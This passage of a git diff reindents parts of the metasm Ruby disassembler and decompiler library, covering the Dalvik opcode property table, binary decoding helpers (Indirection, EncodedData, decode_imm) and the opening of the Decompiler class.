'unused_fd', 'unused_fe', - 'unused_ff' - op.props[:stopexec] = true - else - raise "Internal error #{op.name}" - end - end + def addop_props(op) + case op.name + when 'nop', 'move', 'move_from16', 'move_16', 'move_wide', + 'move_wide_from16', 'move_wide_16', 'move_object', + 'move_object_from16', 'move_object_16', 'move_result', + 'move_result_wide', 'move_result_object', + 'move_exception', 'const_4', 'const_16', 'const', + 'const_high16', 'const_wide_16', 'const_wide_32', + 'const_wide', 'const_wide_high16', 'fill_array_data', + 'cmpl_float', 'cmpg_float', 'cmpl_double', + 'cmpg_double', 'cmp_long', 'neg_int', 'not_int', + 'neg_long', 'not_long', 'neg_float', 'neg_double', + 'int_to_long', 'int_to_float', 'int_to_double', + 'long_to_int', 'long_to_float', 'long_to_double', + 'float_to_int', 'float_to_long', 'float_to_double', + 'double_to_int', 'double_to_long', 'double_to_float', + 'int_to_byte', 'int_to_char', 'int_to_short', 'add_int', + 'sub_int', 'mul_int', 'and_int', 'or_int', 'xor_int', + 'shl_int', 'shr_int', 'ushr_int', 'add_long', + 'sub_long', 'mul_long', 'and_long', 'or_long', + 'xor_long', 'shl_long', 'shr_long', 'ushr_long', + 'add_float', 'sub_float', 'mul_float', 'div_float', + 'rem_float', 'add_double', 'sub_double', 'mul_double', + 'div_double', 'rem_double', 'add_int_2addr', + 'sub_int_2addr', 'mul_int_2addr', 'and_int_2addr', + 'or_int_2addr', 'xor_int_2addr', 'shl_int_2addr', + 'shr_int_2addr', 'ushr_int_2addr', 'add_long_2addr', + 'sub_long_2addr', 'mul_long_2addr', 'and_long_2addr', + 'or_long_2addr', 'xor_long_2addr', 'shl_long_2addr', + 'shr_long_2addr', 'ushr_long_2addr', 'add_float_2addr', + 'sub_float_2addr', 'mul_float_2addr', 'div_float_2addr', + 'rem_float_2addr', 'add_double_2addr', + 'sub_double_2addr', 'mul_double_2addr', + 'div_double_2addr', 'rem_double_2addr', 'add_int_lit16', + 'rsub_int', 'mul_int_lit16', 'and_int_lit16', + 'or_int_lit16', 'xor_int_lit16', 'add_int_lit8', + 'rsub_int_lit8', 'mul_int_lit8', 'and_int_lit8', + 'or_int_lit8', 'xor_int_lit8', 'shl_int_lit8', + 'shr_int_lit8', 'ushr_int_lit8' + # normal opcode, continues to next, nothing raised + when 'const_string', 'const_string_jumbo', 'const_class', + 'monitor_enter', 'monitor_exit', 'check_cast', + 'instance_of', 'array_length', 'new_instance', + 'new_array', 'filled_new_array', + 'filled_new_array_range', 'aget', 'aget_boolean', + 'aget_byte', 'aget_char', 'aget_short', 'aget_wide', + 'aget_object', 'aput', 'aput_boolean', 'aput_byte', + 'aput_char', 'aput_short', 'aput_wide', 'aput_object', + 'iget', 'iget_boolean', 'iget_byte', 'iget_char', + 'iget_short', 'iget_wide', 'iget_object', 'iput', + 'iput_boolean', 'iput_byte', 'iput_char', 'iput_short', + 'iput_wide', 'iput_object', 'sget', 'sget_boolean', + 'sget_byte', 'sget_char', 'sget_short', 'sget_wide', + 'sget_object', 'sput', 'sput_boolean', 'sput_byte', + 'sput_char', 'sput_short', 'sput_wide', 'sput_object', + 'div_int', 'rem_int', 'div_long', 'rem_long', + 'div_int_2addr', 'rem_int_2addr', 'div_long_2addr', + 'rem_long_2addr', 'div_int_lit16', 'rem_int_lit16', + 'div_int_lit8', 'rem_int_lit8' + op.props[:canthrow] = true + when 'invoke_virtual', 'invoke_virtual_range', 'invoke_super', + 'invoke_super_range', 'invoke_direct', + 'invoke_direct_range', 'invoke_static', + 'invoke_static_range', 'invoke_interface', + 'invoke_interface_range' + op.props[:canthrow] = true + op.props[:saveip] = true + op.props[:setip] = true + op.props[:stopexec] = true + when 'return_void', 'return', 'return_wide', 'return_object' + op.props[:setip] = true + op.props[:stopexec] = true + when 'throw' + op.props[:canthrow] = true + op.props[:stopexec] = true + when 'goto', 'goto_16', 'goto_32' + op.props[:setip] = true + op.props[:stopexec] = true + when 'if_eq', 'if_ne', 'if_lt', 'if_ge', 'if_gt', 'if_le', + 'if_eqz', 'if_nez', 'if_ltz', 'if_gez', 'if_gtz', + 'if_lez' + op.props[:setip] = true + when 'packed_switch', 'sparse_switch' + op.props[:setip] = true # if no table match, nostopexec + op.props[:setip] = true + when 'throw_verification_error' + op.props[:canthrow] = true + op.props[:stopexec] = true + when 'execute_inline' + when 'iget_quick', 'iget_wide_quick', 'iget_object_quick', + 'iput_quick', 'iput_wide_quick', 'iput_object_quick' + op.props[:canthrow] = true + when 'invoke_virtual_quick', 'invoke_virtual_quick_range', + 'invoke_super_quick', 'invoke_super_quick_range', + 'invoke_direct_empty' + op.props[:canthrow] = true + op.props[:saveip] = true + op.props[:setip] = true + op.props[:stopexec] = true + when 'unused_3e', 'unused_3f', 'unused_40', 'unused_41', + 'unused_42', 'unused_43', 'unused_73', 'unused_79', + 'unused_7a', 'unused_e3', 'unused_e4', 'unused_e5', + 'unused_e6', 'unused_e7', 'unused_e8', 'unused_e9', + 'unused_ea', 'unused_eb', 'unused_ec', 'unused_ef', + 'unused_f1', 'unused_fc', 'unused_fd', 'unused_fe', + 'unused_ff' + op.props[:stopexec] = true + else + raise "Internal error #{op.name}" + end + end end end diff --git a/lib/metasm/metasm/decode.rb b/lib/metasm/metasm/decode.rb index cbe752f8850d4..56fc2a561f750 100644 --- a/lib/metasm/metasm/decode.rb +++ b/lib/metasm/metasm/decode.rb @@ -12,202 +12,202 @@ module Metasm # symbolic pointer dereference # API similar to Expression class Indirection < ExpressionType - # Expression (the pointer) - attr_accessor :target - alias pointer target - alias pointer= target= - # length in bytes of data referenced - attr_accessor :len - # address of the instruction who generated the indirection - attr_accessor :origin - - def initialize(target, len, origin) - @target, @len, @origin = target, len, origin - end - - def reduce_rec - ptr = Expression[@target.reduce] - (ptr == Expression::Unknown) ? ptr : Indirection.new(ptr, @len, @origin) - end - - def bind(h) - h[self] || Indirection.new(@target.bind(h), @len, @origin) - end - - def hash ; @target.hash^@len.to_i end - def eql?(o) o.class == self.class and [o.target, o.len] == [@target, @len] end - alias == eql? - - include Renderable - def render - ret = [] - qual = {1 => 'byte', 2 => 'word', 4 => 'dword', 8 => 'qword'}[len] || "_#{len*8}bits" if len - ret << "#{qual} ptr " if qual - ret << '[' << @target << ']' - end - - # returns the complexity of the expression (number of externals +1 per indirection) - def complexity - 1+@target.complexity - end - - def self.[](t, l, o=nil) - new(Expression[*t], l, o) - end - - def inspect - "Indirection[#{@target.inspect.sub(/^Expression/, '')}, #{@len.inspect}#{', '+@origin.inspect if @origin}]" - end - - def externals - @target.externals - end - - def match_rec(target, vars) - return false if not target.kind_of? Indirection - t = target.target - if vars[t] - return false if @target != vars[t] - elsif vars.has_key? t - vars[t] = @target - elsif t.kind_of? ExpressionType - return false if not @target.match_rec(t, vars) - else - return false if targ != @target - end - if vars[target.len] - return false if @len != vars[target.len] - elsif vars.has_key? target.len - vars[target.len] = @len - else - return false if target.len != @len - end - vars - end + # Expression (the pointer) + attr_accessor :target + alias pointer target + alias pointer= target= + # length in bytes of data referenced + attr_accessor :len + # address of the instruction who generated the indirection + attr_accessor :origin + + def initialize(target, len, origin) + @target, @len, @origin = target, len, origin + end + + def reduce_rec + ptr = Expression[@target.reduce] + (ptr == Expression::Unknown) ? ptr : Indirection.new(ptr, @len, @origin) + end + + def bind(h) + h[self] || Indirection.new(@target.bind(h), @len, @origin) + end + + def hash ; @target.hash^@len.to_i end + def eql?(o) o.class == self.class and [o.target, o.len] == [@target, @len] end + alias == eql? + + include Renderable + def render + ret = [] + qual = {1 => 'byte', 2 => 'word', 4 => 'dword', 8 => 'qword'}[len] || "_#{len*8}bits" if len + ret << "#{qual} ptr " if qual + ret << '[' << @target << ']' + end + + # returns the complexity of the expression (number of externals +1 per indirection) + def complexity + 1+@target.complexity + end + + def self.[](t, l, o=nil) + new(Expression[*t], l, o) + end + + def inspect + "Indirection[#{@target.inspect.sub(/^Expression/, '')}, #{@len.inspect}#{', '+@origin.inspect if @origin}]" + end + + def externals + @target.externals + end + + def match_rec(target, vars) + return false if not target.kind_of? Indirection + t = target.target + if vars[t] + return false if @target != vars[t] + elsif vars.has_key? t + vars[t] = @target + elsif t.kind_of? ExpressionType + return false if not @target.match_rec(t, vars) + else + return false if targ != @target + end + if vars[target.len] + return false if @len != vars[target.len] + elsif vars.has_key? target.len + vars[target.len] = @len + else + return false if target.len != @len + end + vars + end end class Expression - # returns the complexity of the expression (number of externals +1 per indirection) - def complexity - case @lexpr - when ExpressionType; @lexpr.complexity - when nil, ::Numeric; 0 - else 1 - end + - case @rexpr - when ExpressionType; @rexpr.complexity - when nil, ::Numeric; 0 - else 1 - end - end - - def expr_indirections - ret = case @lexpr - when Indirection; [@lexpr] - when ExpressionType; @lexpr.expr_indirections - else [] - end - case @rexpr - when Indirection; ret << @rexpr - when ExpressionType; ret.concat @rexpr.expr_indirections - else ret - end - end + # returns the complexity of the expression (number of externals +1 per indirection) + def complexity + case @lexpr + when ExpressionType; @lexpr.complexity + when nil, ::Numeric; 0 + else 1 + end + + case @rexpr + when ExpressionType; @rexpr.complexity + when nil, ::Numeric; 0 + else 1 + end + end + + def expr_indirections + ret = case @lexpr + when Indirection; [@lexpr] + when ExpressionType; @lexpr.expr_indirections + else [] + end + case @rexpr + when Indirection; ret << @rexpr + when ExpressionType; ret.concat @rexpr.expr_indirections + else ret + end + end end class EncodedData - # returns an ::Integer from self.ptr, advances ptr - # bytes from rawsize to virtsize = 0 - # ignores self.relocations - def get_byte - @ptr += 1 - if @ptr <= @data.length - b = @data[ptr-1] - b = b.unpack('C').first if b.kind_of? ::String # 1.9 - b - elsif @ptr <= @virtsize - 0 - end - end - - # reads len bytes from self.data, advances ptr - # bytes from rawsize to virtsize are returned as zeroes - # ignores self.relocations - def read(len=@virtsize-@ptr) - len = @virtsize-@ptr if len > @virtsize-@ptr - str = (@ptr < @data.length) ? @data[@ptr, len] : '' - str = str.to_str.ljust(len, "\0") if str.length < len - @ptr += len - str - end - - # decodes an immediate value from self.ptr, advances ptr - # returns an Expression on relocation, or an ::Integer - # if ptr has a relocation but the type/endianness does not match, the reloc is ignored and a warning is issued - # TODO arg type => sign+len - def decode_imm(type, endianness) - raise "invalid imm type #{type.inspect}" if not isz = Expression::INT_SIZE[type] - if rel = @reloc[@ptr] - if Expression::INT_SIZE[rel.type] == isz and rel.endianness == endianness - @ptr += rel.length - return rel.target - end - puts "W: Immediate type/endianness mismatch, ignoring relocation #{rel.target.inspect} (wanted #{type.inspect})" if $DEBUG - end - Expression.decode_imm(read(isz/8), type, endianness) - end - alias decode_immediate decode_imm + # returns an ::Integer from self.ptr, advances ptr + # bytes from rawsize to virtsize = 0 + # ignores self.relocations + def get_byte + @ptr += 1 + if @ptr <= @data.length + b = @data[ptr-1] + b = b.unpack('C').first if b.kind_of? ::String # 1.9 + b + elsif @ptr <= @virtsize + 0 + end + end + + # reads len bytes from self.data, advances ptr + # bytes from rawsize to virtsize are returned as zeroes + # ignores self.relocations + def read(len=@virtsize-@ptr) + len = @virtsize-@ptr if len > @virtsize-@ptr + str = (@ptr < @data.length) ? @data[@ptr, len] : '' + str = str.to_str.ljust(len, "\0") if str.length < len + @ptr += len + str + end + + # decodes an immediate value from self.ptr, advances ptr + # returns an Expression on relocation, or an ::Integer + # if ptr has a relocation but the type/endianness does not match, the reloc is ignored and a warning is issued + # TODO arg type => sign+len + def decode_imm(type, endianness) + raise "invalid imm type #{type.inspect}" if not isz = Expression::INT_SIZE[type] + if rel = @reloc[@ptr] + if Expression::INT_SIZE[rel.type] == isz and rel.endianness == endianness + @ptr += rel.length + return rel.target + end + puts "W: Immediate type/endianness mismatch, ignoring relocation #{rel.target.inspect} (wanted #{type.inspect})" if $DEBUG + end + Expression.decode_imm(read(isz/8), type, endianness) + end + alias decode_immediate decode_imm end class Expression - # decodes an immediate from a raw binary string - # type may be a length in bytes, interpreted as unsigned, or an expression type (eg :u32) - # endianness is either an endianness or an object than responds to endianness - def self.decode_imm(str, type, endianness, off=0) - type = INT_SIZE.keys.find { |k| k.to_s[0] == ?a and INT_SIZE[k] == 8*type } if type.kind_of? ::Integer - endianness = endianness.endianness if not endianness.kind_of? ::Symbol - str = str[off, INT_SIZE[type]/8].to_s - str = str.reverse if endianness == :little - val = str.unpack('C*').inject(0) { |val_, b| (val_ << 8) | b } - val = make_signed(val, INT_SIZE[type]) if type.to_s[0] == ?i - val - end - class << self - alias decode_immediate decode_imm - end + # decodes an immediate from a raw binary string + # type may be a length in bytes, interpreted as unsigned, or an expression type (eg :u32) + # endianness is either an endianness or an object than responds to endianness + def self.decode_imm(str, type, endianness, off=0) + type = INT_SIZE.keys.find { |k| k.to_s[0] == ?a and INT_SIZE[k] == 8*type } if type.kind_of? ::Integer + endianness = endianness.endianness if not endianness.kind_of? ::Symbol + str = str[off, INT_SIZE[type]/8].to_s + str = str.reverse if endianness == :little + val = str.unpack('C*').inject(0) { |val_, b| (val_ << 8) | b } + val = make_signed(val, INT_SIZE[type]) if type.to_s[0] == ?i + val + end + class << self + alias decode_immediate decode_imm + end end class CPU - # decodes the instruction at edata.ptr, mapped at virtual address off - # returns a DecodedInstruction or nil - def decode_instruction(edata, addr) - @bin_lookaside ||= build_bin_lookaside - di = decode_findopcode edata - di.address = addr if di - di = decode_instr_op(edata, di) if di - decode_instr_interpret(di, addr) if di - end - - # matches the binary opcode at edata.ptr - # returns di or nil - def decode_findopcode(edata) - DecodedInstruction.new self - end - - # decodes di.instruction - # returns di or nil - def decode_instr_op(edata, di) - end - - # may modify di.instruction.args for eg jump offset => absolute address - # returns di or nil - def decode_instr_interpret(di, addr) - di - end - - # number of instructions following a jump that are still executed - def delay_slot(di=nil) - 0 - end + # decodes the instruction at edata.ptr, mapped at virtual address off + # returns a DecodedInstruction or nil + def decode_instruction(edata, addr) + @bin_lookaside ||= build_bin_lookaside + di = decode_findopcode edata + di.address = addr if di + di = decode_instr_op(edata, di) if di + decode_instr_interpret(di, addr) if di + end + + # matches the binary opcode at edata.ptr + # returns di or nil + def decode_findopcode(edata) + DecodedInstruction.new self + end + + # decodes di.instruction + # returns di or nil + def decode_instr_op(edata, di) + end + + # may modify di.instruction.args for eg jump offset => absolute address + # returns di or nil + def decode_instr_interpret(di, addr) + di + end + + # number of instructions following a jump that are still executed + def delay_slot(di=nil) + 0 + end end end diff --git a/lib/metasm/metasm/decompile.rb b/lib/metasm/metasm/decompile.rb index 09912936822f6..a835f44946826 100644 --- a/lib/metasm/metasm/decompile.rb +++ b/lib/metasm/metasm/decompile.rb @@ -14,2646 +14,2646 @@ class C::Block; attr_accessor :decompdata; end class DecodedFunction; attr_accessor :decompdata; end class CPU - def decompile_check_abi(dcmp, entry, func) - end + def decompile_check_abi(dcmp, entry, func) + end end class Decompiler - # TODO add methods to C::CExpr - AssignOp = [:'=', :'+=', :'-=', :'*=', :'/=', :'%=', :'^=', :'&=', :'|=', :'>>=', :'<<=', :'++', :'--'] - - attr_accessor :dasm, :c_parser - attr_accessor :forbid_optimize_dataflow, :forbid_optimize_code, :forbid_decompile_ifwhile, :forbid_decompile_types, :forbid_optimize_labels - # recursive flag: for each subfunction, recurse is decremented, when 0 only the prototype is decompiled, when <0 nothing is done - attr_accessor :recurse - - def initialize(dasm, cp = dasm.c_parser) - @dasm = dasm - @recurse = 1/0.0 # Infinity - @c_parser = cp || @dasm.cpu.new_cparser - end - - # decompile recursively function from an entrypoint, then perform global optimisation (static vars, ...) - # should be called once after everything is decompiled (global optimizations may bring bad results otherwise) - # use decompile_func for incremental decompilation - # returns the c_parser - def decompile(*entry) - entry.each { |f| decompile_func(f) } - finalize - @c_parser - end - - # decompile a function, decompiling subfunctions as needed - # may return :restart, which means that the decompilation should restart from the entrypoint (and bubble up) (eg a new codepath is found which may changes dependency in blocks etc) - def decompile_func(entry) - return if @recurse < 0 - entry = @dasm.normalize entry - return if not @dasm.decoded[entry] - - # create a new toplevel function to hold our code - func = C::Variable.new - func.name = @dasm.auto_label_at(entry, 'func') - if f = @dasm.function[entry] and f.decompdata and f.decompdata[:return_type] - rettype = f.decompdata[:return_type] - else - rettype = C::BaseType.new(:int) - end - func.type = C::Function.new rettype, [] - if @c_parser.toplevel.symbol[func.name] - return if @recurse == 0 - if not @c_parser.toplevel.statements.grep(C::Declaration).find { |decl| decl.var.name == func.name } - # recursive dependency: declare prototype - puts "function #{func.name} is recursive: predecompiling for prototype" if $VERBOSE - pre_recurse = @recurse - @recurse = 0 - @c_parser.toplevel.symbol.delete func.name - decompile_func(entry) - @recurse = pre_recurse - if not dcl = @c_parser.toplevel.statements.grep(C::Declaration).find { |decl| decl.var.name == func.name } - @c_parser.toplevel.statements << C::Declaration.new(func) - end - end - return - end - @c_parser.toplevel.symbol[func.name] = func - puts "decompiling #{func.name}" if $VERBOSE - - while catch(:restart) { do_decompile_func(entry, func) } == :restart - retval = :restart - end - - @c_parser.toplevel.symbol[func.name] = func # recursive func prototype could have overwritten us - @c_parser.toplevel.statements << C::Declaration.new(func) - - puts " decompiled #{func.name}" if $VERBOSE - - retval - end - - # calls decompile_func with recurse -= 1 (internal use) - def decompile_func_rec(entry) - @recurse -= 1 - decompile_func(entry) - ensure - @recurse += 1 - end - - def do_decompile_func(entry, func) - # find decodedinstruction graph of the function, decompile subfuncs - myblocks = listblocks_func(entry) - - # [esp+8] => [:frameptr-12] - makestackvars entry, myblocks.map { |b, to| @dasm.decoded[b].block } - - # find registry dependencies between blocks - deps = @dasm.cpu.decompile_func_finddeps(self, myblocks, func) - - scope = func.initializer = C::Block.new(@c_parser.toplevel) - if df = @dasm.function[entry] - scope.decompdata = df.decompdata ||= {:stackoff_type => {}, :stackoff_name => {}} - else - scope.decompdata ||= {:stackoff_type => {}, :stackoff_name => {}} - end - - # di blocks => raw c statements, declare variables - @dasm.cpu.decompile_blocks(self, myblocks, deps, func) - - simplify_goto(scope) - namestackvars(scope) - unalias_vars(scope, func) - decompile_c_types(scope) - optimize(scope) - remove_unreferenced_vars(scope) - cleanup_var_decl(scope, func) - if @recurse > 0 - decompile_controlseq(scope) - optimize_vars(scope) - optimize_ctrl(scope) - optimize_vars(scope) - remove_unreferenced_vars(scope) - simplify_varname_noalias(scope) - rename_variables(scope) - end - @dasm.cpu.decompile_check_abi(self, entry, func) - - case ret = scope.statements.last - when C::CExpression; puts "no return at end of func" if $VERBOSE - when C::Return - if not ret.value - scope.statements.pop - else - v = ret.value - v = v.rexpr if v.kind_of? C::CExpression and not v.op and v.rexpr.kind_of? C::Typed - func.type.type = v.type - end - end - - if @recurse == 0 - # we need only the prototype - func.initializer = nil - end - end - - # redecompile a function, redecompiles functions calling it if its prototype changed - def redecompile(name) - @c_parser.toplevel.statements.delete_if { |st| st.kind_of? C::Declaration and st.var.name == name } - oldvar = @c_parser.toplevel.symbol.delete name - - decompile_func(name) - - if oldvar and newvar = @c_parser.toplevel.symbol[name] and oldvar.type.kind_of? C::Function and newvar.type.kind_of? C::Function - o, n = oldvar.type, newvar.type - if o.type != n.type or o.args.to_a.length != n.args.to_a.length or o.args.to_a.zip(n.args.to_a).find { |oa, na| oa.type != na.type } - # XXX a may depend on b and c, and b may depend on c -> redecompile c twice - # XXX if the dcmp is unstable, may also infinite loop on mutually recursive funcs.. - @c_parser.toplevel.statements.dup.each { |st| - next if not st.kind_of? C::Declaration - next if not st.var.initializer - next if st.var.name == name - next if not walk_ce(st) { |ce| break true if ce.op == :funcall and ce.lexpr.kind_of? C::Variable and ce.lexpr.name == name } - redecompile(st.var.name) - } - end - end - end - - def new_global_var(addr, type, scope=nil) - addr = @dasm.normalize(addr) - - # (almost) NULL ptr - return if addr.kind_of? Fixnum and addr >= 0 and addr < 32 - - # check preceding structure we're hitting - # TODO check what we step over when defining a new static struct - 0x100.times { |i_| - next if not n = @dasm.get_label_at(addr-i_) - next if not v = @c_parser.toplevel.symbol[n] - next if not v.type.pointer? or not v.type.pointed.untypedef.kind_of? C::Union - break if i_ == 0 # XXX it crashes later if we dont break here - next if sizeof(v.type.pointed) <= i_ - return structoffset(v.type.pointed.untypedef, C::CExpression[v], i_, nil) - } - - ptype = type.pointed.untypedef if type.pointer? - if ptype.kind_of? C::Function - name = @dasm.auto_label_at(addr, 'sub', 'xref', 'byte', 'word', 'dword', 'unk') - if @dasm.get_section_at(addr) and @recurse > 0 - puts "found function pointer to #{name}" if $VERBOSE - @dasm.disassemble(addr) if not @dasm.decoded[addr] # TODO disassemble_fast ? - f = @dasm.function[addr] ||= DecodedFunction.new - # TODO detect thunks (__noreturn) - f.decompdata ||= { :stackoff_type => {}, :stackoff_name => {} } - if not s = @c_parser.toplevel.symbol[name] or not s.initializer or not s.type.untypedef.kind_of? C::Function - os = @c_parser.toplevel.symbol.delete name - @c_parser.toplevel.statements.delete_if { |ts| ts.kind_of? C::Declaration and ts.var.name == name } - aoff = 1 - ptype.args.to_a.each { |a| - aoff = (aoff + @c_parser.typesize[:ptr] - 1) / @c_parser.typesize[:ptr] * @c_parser.typesize[:ptr] - f.decompdata[:stackoff_type][aoff] ||= a.type - f.decompdata[:stackoff_name][aoff] ||= a.name if a.name - aoff += sizeof(a) # ary ? - } - decompile_func_rec(addr) - s = @c_parser.toplevel.symbol[name] - walk_ce([@c_parser.toplevel, scope]) { |ce| - ce.lexpr = s if ce.lexpr == os - ce.rexpr = s if ce.rexpr == os - } if os and s # update existing references to old instance - # else redecompile with new prototye ? - end - end - end - - name = case (type.pointer? && tsz = sizeof(nil, ptype)) - when 1; 'byte' - when 2; 'word' - when 4; 'dword' - else 'unk' - end - name = 'stru' if ptype.kind_of? C::Union - name = @dasm.auto_label_at(addr, name, 'xref', 'byte', 'word', 'dword', 'unk', 'stru') - - if not var = @c_parser.toplevel.symbol[name] - var = C::Variable.new - var.name = name - var.type = type.pointer? ? C::Array.new(ptype) : type - @c_parser.toplevel.symbol[var.name] = var - @c_parser.toplevel.statements << C::Declaration.new(var) - end - if ptype.kind_of? C::Union and type.pointer? and s = @dasm.get_section_at(name) and s[0].ptr < s[0].length - # TODO struct init, array, fptrs.. - elsif type.pointer? and not type.pointed.untypedef.kind_of? C::Function and s = @dasm.get_section_at(name) and s[0].ptr < s[0].length and - [1, 2, 4].include? tsz and (not var.type.pointer? or sizeof(var.type.pointed) != sizeof(type.pointed) or not var.initializer) - # TODO do not overlap other statics (but labels may refer to elements of the array...) - data = (0..256).map { - v = s[0].decode_imm("u#{tsz*8}".to_sym, @dasm.cpu.endianness) - v = decompile_cexpr(v, @c_parser.toplevel) if v.kind_of? Expression # relocation - v - } - var.initializer = data.map { |v| C::CExpression[v, C::BaseType.new(:int)] } unless (data - [0]).empty? - if (tsz == 1 or tsz == 2) and eos = data.index(0) and (0..3).all? { |i| data[i] >= 0x20 and data[i] < 0x7f } # printable str - # XXX 0x80 with ruby1.9... - var.initializer = C::CExpression[data[0, eos].pack('C*'), C::Pointer.new(ptype)] rescue nil - end - if var.initializer.kind_of? ::Array and i = var.initializer.first and i.kind_of? C::CExpression and not i.op and i.rexpr.kind_of? C::Variable and - i.rexpr.type.kind_of? C::Function and not @dasm.get_section_at(@dasm.normalize(i.rexpr.name)) # iat_ExternalFunc - i.type = i.rexpr.type - type = var.type = C::Array.new(C::Pointer.new(i.type)) - var.initializer = [i] - end - var.initializer = nil if var.initializer.kind_of? ::Array and not type.untypedef.kind_of? C::Array - end - - # TODO patch existing references to addr ? (or would they have already triggered new_global_var?) - - # return the object to use to replace the raw addr - var - end - - # return an array of [address of block start, list of block to]] - # decompile subfunctions - def listblocks_func(entry) - @autofuncs ||= [] - blocks = [] - entry = dasm.normalize entry - todo = [entry] - while a = todo.pop - next if blocks.find { |aa, at| aa == a } - next if not di = @dasm.di_at(a) - blocks << [a, []] - di.block.each_to { |ta, type| - next if type == :indirect - ta = dasm.normalize ta - if type != :subfuncret and not @dasm.function[ta] and - (not @dasm.function[entry] or @autofuncs.include? entry) and - di.block.list.last.opcode.props[:saveip] - # possible noreturn function - # XXX call $+5; pop eax - @autofuncs << ta - @dasm.function[ta] = DecodedFunction.new - puts "autofunc #{Expression[ta]}" if $VERBOSE - end - - if @dasm.function[ta] and type != :subfuncret - f = dasm.auto_label_at(ta, 'func') - ta = dasm.normalize($1) if f =~ /^thunk_(.*)/ - ret = decompile_func_rec(ta) if (ta != entry or di.block.to_subfuncret) - throw :restart, :restart if ret == :restart - else - @dasm.auto_label_at(ta, 'label') if blocks.find { |aa, at| aa == ta } - blocks.last[1] |= [ta] - todo << ta - end - } - end - blocks - end - - # backtraces an expression from addr - # returns an integer, a label name, or an Expression - # XXX '(GetProcAddr("foo"))()' should not decompile to 'foo()' - def backtrace_target(expr, addr) - if n = @dasm.backtrace(expr, addr).first - return expr if n == Expression::Unknown - n = Expression[n].reduce_rec - n = @dasm.get_label_at(n) || n - n = $1 if n.kind_of? ::String and n =~ /^thunk_(.*)/ - n - else - expr - end - end - - # patches instruction's backtrace_binding to replace things referring to a static stack offset from func start by :frameptr+off - def makestackvars(funcstart, blocks) - blockstart = nil - cache_di = nil - cache = {} # [i_s, e, type] => backtrace - tovar = lambda { |di, e, i_s| - case e - when Expression; Expression[tovar[di, e.lexpr, i_s], e.op, tovar[di, e.rexpr, i_s]].reduce - when Indirection; Indirection[tovar[di, e.target, i_s], e.len, e.origin] - when :frameptr; e - when ::Symbol - cache.clear if cache_di != di ; cache_di = di - vals = cache[[e, i_s, 0]] ||= @dasm.backtrace(e, di.address, :snapshot_addr => blockstart, - :include_start => i_s, :no_check => true, :terminals => [:frameptr]) - # backtrace only to blockstart first - if vals.length == 1 and ee = vals.first and ee.kind_of? Expression and (ee == Expression[:frameptr] or - (ee.lexpr == :frameptr and ee.op == :+ and ee.rexpr.kind_of? ::Integer) or - (not ee.lexpr and ee.op == :+ and ee.rexpr.kind_of? Indirection and eep = ee.rexpr.pointer and - (eep == Expression[:frameptr] or (eep.lexpr == :frameptr and eep.op == :+ and eep.rexpr.kind_of? ::Integer)))) - ee - else - # fallback on full run (could restart from blockstart with ee, but may reevaluate addr_binding.. - vals = cache[[e, i_s, 1]] ||= @dasm.backtrace(e, di.address, :snapshot_addr => funcstart, - :include_start => i_s, :no_check => true, :terminals => [:frameptr]) - if vals.length == 1 and ee = vals.first and (ee.kind_of? Expression and (ee == Expression[:frameptr] or - (ee.lexpr == :frameptr and ee.op == :+ and ee.rexpr.kind_of? ::Integer))) + # TODO add methods to C::CExpr + AssignOp = [:'=', :'+=', :'-=', :'*=', :'/=', :'%=', :'^=', :'&=', :'|=', :'>>=', :'<<=', :'++', :'--'] + + attr_accessor :dasm, :c_parser + attr_accessor :forbid_optimize_dataflow, :forbid_optimize_code, :forbid_decompile_ifwhile, :forbid_decompile_types, :forbid_optimize_labels + # recursive flag: for each subfunction, recurse is decremented, when 0 only the prototype is decompiled, when <0 nothing is done + attr_accessor :recurse + + def initialize(dasm, cp = dasm.c_parser) + @dasm = dasm + @recurse = 1/0.0 # Infinity + @c_parser = cp || @dasm.cpu.new_cparser + end + + # decompile recursively function from an entrypoint, then perform global optimisation (static vars, ...) + # should be called once after everything is decompiled (global optimizations may bring bad results otherwise) + # use decompile_func for incremental decompilation + # returns the c_parser + def decompile(*entry) + entry.each { |f| decompile_func(f) } + finalize + @c_parser + end + + # decompile a function, decompiling subfunctions as needed + # may return :restart, which means that the decompilation should restart from the entrypoint (and bubble up) (eg a new codepath is found which may changes dependency in blocks etc) + def decompile_func(entry) + return if @recurse < 0 + entry = @dasm.normalize entry + return if not @dasm.decoded[entry] + + # create a new toplevel function to hold our code + func = C::Variable.new + func.name = @dasm.auto_label_at(entry, 'func') + if f = @dasm.function[entry] and f.decompdata and f.decompdata[:return_type] + rettype = f.decompdata[:return_type] + else + rettype = C::BaseType.new(:int) + end + func.type = C::Function.new rettype, [] + if @c_parser.toplevel.symbol[func.name] + return if @recurse == 0 + if not @c_parser.toplevel.statements.grep(C::Declaration).find { |decl| decl.var.name == func.name } + # recursive dependency: declare prototype + puts "function #{func.name} is recursive: predecompiling for prototype" if $VERBOSE + pre_recurse = @recurse + @recurse = 0 + @c_parser.toplevel.symbol.delete func.name + decompile_func(entry) + @recurse = pre_recurse + if not dcl = @c_parser.toplevel.statements.grep(C::Declaration).find { |decl| decl.var.name == func.name } + @c_parser.toplevel.statements << C::Declaration.new(func) + end + end + return + end + @c_parser.toplevel.symbol[func.name] = func + puts "decompiling #{func.name}" if $VERBOSE + + while catch(:restart) { do_decompile_func(entry, func) } == :restart + retval = :restart + end + + @c_parser.toplevel.symbol[func.name] = func # recursive func prototype could have overwritten us + @c_parser.toplevel.statements << C::Declaration.new(func) + + puts " decompiled #{func.name}" if $VERBOSE + + retval + end + + # calls decompile_func with recurse -= 1 (internal use) + def decompile_func_rec(entry) + @recurse -= 1 + decompile_func(entry) + ensure + @recurse += 1 + end + + def do_decompile_func(entry, func) + # find decodedinstruction graph of the function, decompile subfuncs + myblocks = listblocks_func(entry) + + # [esp+8] => [:frameptr-12] + makestackvars entry, myblocks.map { |b, to| @dasm.decoded[b].block } + + # find registry dependencies between blocks + deps = @dasm.cpu.decompile_func_finddeps(self, myblocks, func) + + scope = func.initializer = C::Block.new(@c_parser.toplevel) + if df = @dasm.function[entry] + scope.decompdata = df.decompdata ||= {:stackoff_type => {}, :stackoff_name => {}} + else + scope.decompdata ||= {:stackoff_type => {}, :stackoff_name => {}} + end + + # di blocks => raw c statements, declare variables + @dasm.cpu.decompile_blocks(self, myblocks, deps, func) + + simplify_goto(scope) + namestackvars(scope) + unalias_vars(scope, func) + decompile_c_types(scope) + optimize(scope) + remove_unreferenced_vars(scope) + cleanup_var_decl(scope, func) + if @recurse > 0 + decompile_controlseq(scope) + optimize_vars(scope) + optimize_ctrl(scope) + optimize_vars(scope) + 